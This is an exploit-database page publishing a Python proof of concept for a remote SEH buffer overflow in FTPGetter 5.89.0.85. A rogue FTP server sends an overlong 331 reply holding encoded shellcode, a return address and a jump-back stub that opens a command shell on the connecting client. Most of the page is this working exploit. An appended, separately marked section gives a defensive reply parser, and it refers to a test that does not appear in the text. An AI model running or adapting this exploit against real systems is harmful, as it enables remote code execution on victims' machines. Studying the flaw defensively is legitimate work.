FTPGetter 5.89.0.85 - Buffer Overflow (SEH) Exploit

Published 16 Jul 2017. Reported by Paul Purcell. Type: zdt. Source: 0day.today

FTPGetter 5.89.0.85 Remote SEH Buffer Overflow in Log Viewer

Code
#!/usr/bin/python
 
# Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow
# Date: 07/14/2017
# Exploit Author: Paul Purcell
# Vendor Homepage: https://www.ftpgetter.com/
# Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request
# Version: FTPGetter 5.89.0.85 (also works on earlier versions)
# Tested on: Windows 10 Pro 1703 x64
# Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww
# Category: Remote Code Execution
#
# Timeline: 05/25/16 Bug found
#           05/31/16 Vendor notified - no response
#           07/15/16 Vendor notified - no response
#           -------- Vendor notified multiple times over a year, no response.
#           07/14/17 Exploit Published
#
# Summary:  There is a buffer overflow in the log viewer/parser of FTPGetter.  When a malicious ftp server returns a long
#           331 response, the overflow overwrites the SEH record and is exploitable.  There are many bad characters, so I had to ascii encode everything.
#           My PoC runs code to launch a command shell.  Also note the time of day is displayed in the log viewer, which will
#           change the length of the buffer needed.  Just adjust your sled accordingly.
  
from socket import *
 
#ascii encoded launch cmd.exe
buf =  ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x4b\x4c\x6b\x58\x4f\x72\x67\x70\x43\x30\x55\x50\x33"
buf += "\x50\x4f\x79\x4a\x45\x44\x71\x4f\x30\x71\x74\x6c\x4b"
buf += "\x70\x50\x34\x70\x4e\x6b\x61\x42\x54\x4c\x4c\x4b\x42"
buf += "\x72\x47\x64\x4e\x6b\x64\x32\x44\x68\x36\x6f\x4c\x77"
buf += "\x42\x6a\x46\x46\x30\x31\x4b\x4f\x4c\x6c\x57\x4c\x31"
buf += "\x71\x63\x4c\x44\x42\x64\x6c\x35\x70\x7a\x61\x38\x4f"
buf += "\x56\x6d\x55\x51\x6f\x37\x38\x62\x4c\x32\x61\x42\x52"
buf += "\x77\x4c\x4b\x51\x42\x32\x30\x6e\x6b\x50\x4a\x77\x4c"
buf += "\x4e\x6b\x42\x6c\x34\x51\x44\x38\x68\x63\x32\x68\x66"
buf += "\x61\x58\x51\x62\x71\x6c\x4b\x76\x39\x35\x70\x35\x51"
buf += "\x49\x43\x4e\x6b\x37\x39\x67\x68\x68\x63\x55\x6a\x72"
buf += "\x69\x4c\x4b\x64\x74\x4e\x6b\x65\x51\x5a\x76\x35\x61"
buf += "\x69\x6f\x4c\x6c\x6b\x71\x78\x4f\x54\x4d\x57\x71\x39"
buf += "\x57\x46\x58\x79\x70\x51\x65\x4c\x36\x67\x73\x51\x6d"
buf += "\x38\x78\x67\x4b\x73\x4d\x64\x64\x32\x55\x39\x74\x56"
buf += "\x38\x4c\x4b\x62\x78\x54\x64\x37\x71\x79\x43\x75\x36"
buf += "\x4e\x6b\x46\x6c\x42\x6b\x4e\x6b\x56\x38\x47\x6c\x46"
buf += "\x61\x5a\x73\x6c\x4b\x45\x54\x4c\x4b\x33\x31\x48\x50"
buf += "\x4c\x49\x73\x74\x44\x64\x44\x64\x33\x6b\x53\x6b\x50"
buf += "\x61\x73\x69\x63\x6a\x62\x71\x59\x6f\x6b\x50\x53\x6f"
buf += "\x51\x4f\x32\x7a\x4e\x6b\x72\x32\x7a\x4b\x4e\x6d\x31"
buf += "\x4d\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x38\x32\x67\x70"
buf += "\x63\x30\x53\x30\x66\x30\x75\x38\x36\x51\x6e\x6b\x52"
buf += "\x4f\x4f\x77\x39\x6f\x4b\x65\x4d\x6b\x6a\x50\x4f\x45"
buf += "\x4f\x52\x30\x56\x42\x48\x6e\x46\x6f\x65\x6f\x4d\x6d"
buf += "\x4d\x49\x6f\x7a\x75\x45\x6c\x73\x36\x51\x6c\x37\x7a"
buf += "\x4b\x30\x39\x6b\x39\x70\x30\x75\x76\x65\x6d\x6b\x72"
buf += "\x67\x32\x33\x52\x52\x62\x4f\x51\x7a\x75\x50\x76\x33"
buf += "\x79\x6f\x4b\x65\x55\x33\x62\x4d\x72\x44\x34\x6e\x53"
buf += "\x55\x43\x48\x61\x75\x57\x70\x41\x41"
 
#All the normal ways to jump back to the code I control contained bad characters, so again I had to ascii encode
jmpback =  ""
jmpback += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
jmpback += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
jmpback += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
jmpback += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
jmpback += "\x4e\x6d\x4d\x6e\x46\x70\x49\x6e\x6b\x4f\x4b\x4f\x49"
jmpback += "\x6f\x6a\x47\x41\x41"
 
host = "0.0.0.0"
port = 21
 
sled="NjoyUrShell!"
fill="\x41"*(480-len(buf))
nseh="\x74\x06\x90\x90"
seh="\xad\x11\x4d\x00"
prepesi="\x58\x58\x58\x8d\x70\x10\x90\x90"
jnk="B"*400
sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk)
sock = socket(AF_INET, SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
 
 
print "Anti-FtpGetter FTP Server Started!"
print "Ready to pwn on port %d..." % port
  
connect, hostip = sock.accept()
print "Connection accepted from %s" % hostip[0]
connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1..\r\n")
connect.recv(64)  # Receive USER
print "Sending EViL 331 response"
connect.send("331 "+sploit+"\r\n")
print "Here, have a handy dandy command shell!"
connect.close()
sock.close()
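A defensive counterpart to the weakness described in the summary, added here as an example that is not part of the original exploit or of FTPGetter: an FTP reply parser that bounds the length of a server reply line before the line is stored, displayed or logged, which is the check a log viewer needs so that an overlong 331 reply never reaches a fixed-size buffer. The two size limits are assumed values, not values from the page or from RFC 959.

```python
# Added example, not from the original exploit or from FTPGetter: an FTP
# reply parser that rejects overlong reply lines before they reach whatever
# stores, displays or logs them. The two limits are assumed values.
MAX_REPLY_LINE = 512    # assumed cap for one reply line (code + text)
MAX_REPLY_BYTES = 8192  # assumed cap for a whole multi-line reply


class ReplyTooLong(ValueError):
    """Server reply exceeds a configured size limit."""


class MalformedReply(ValueError):
    """Server reply does not follow the '<3 digits><space or ->text' form."""


def parse_reply(data):
    """Parse one raw CRLF-terminated FTP reply (bytes) into (code, lines).

    b"331 text\\r\\n" is a single-line reply; a multi-line reply opens with
    b"331-text\\r\\n" and closes with a b"331 text\\r\\n" line. Every line is
    length-checked before it is decoded or returned to the caller.
    """
    if len(data) > MAX_REPLY_BYTES:
        raise ReplyTooLong("reply of %d bytes exceeds %d" % (len(data), MAX_REPLY_BYTES))
    lines = data.split(b"\r\n")
    if lines[-1] != b"":
        raise MalformedReply("reply is not CRLF-terminated")
    lines = lines[:-1]
    first = lines[0] if lines else b""
    if len(first) < 4 or not first[:3].isdigit() or first[3:4] not in (b" ", b"-"):
        raise MalformedReply("bad reply header: %r" % first[:16])
    code = first[:3]
    text = []
    for line in lines:
        if len(line) > MAX_REPLY_LINE:
            raise ReplyTooLong("line of %d bytes exceeds %d" % (len(line), MAX_REPLY_LINE))
        text.append(line.decode("ascii", "replace"))  # replace, never reject, non-ASCII
    if first[3:4] == b"-" and not lines[-1].startswith(code + b" "):
        raise MalformedReply("multi-line reply lacks its terminating line")
    return int(code), text


def classify_reply(data):
    """Return 'ok', 'too-long' or 'malformed' for one raw reply."""
    try:
        parse_reply(data)
    except ReplyTooLong:
        return "too-long"
    except MalformedReply:
        return "malformed"
    return "ok"
```

The constructed 1000-byte 331 reply in the test is the shape of input the summary describes; the parser refuses it at the per-line check rather than passing it on.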

#  0day.today [2018-04-09]  #
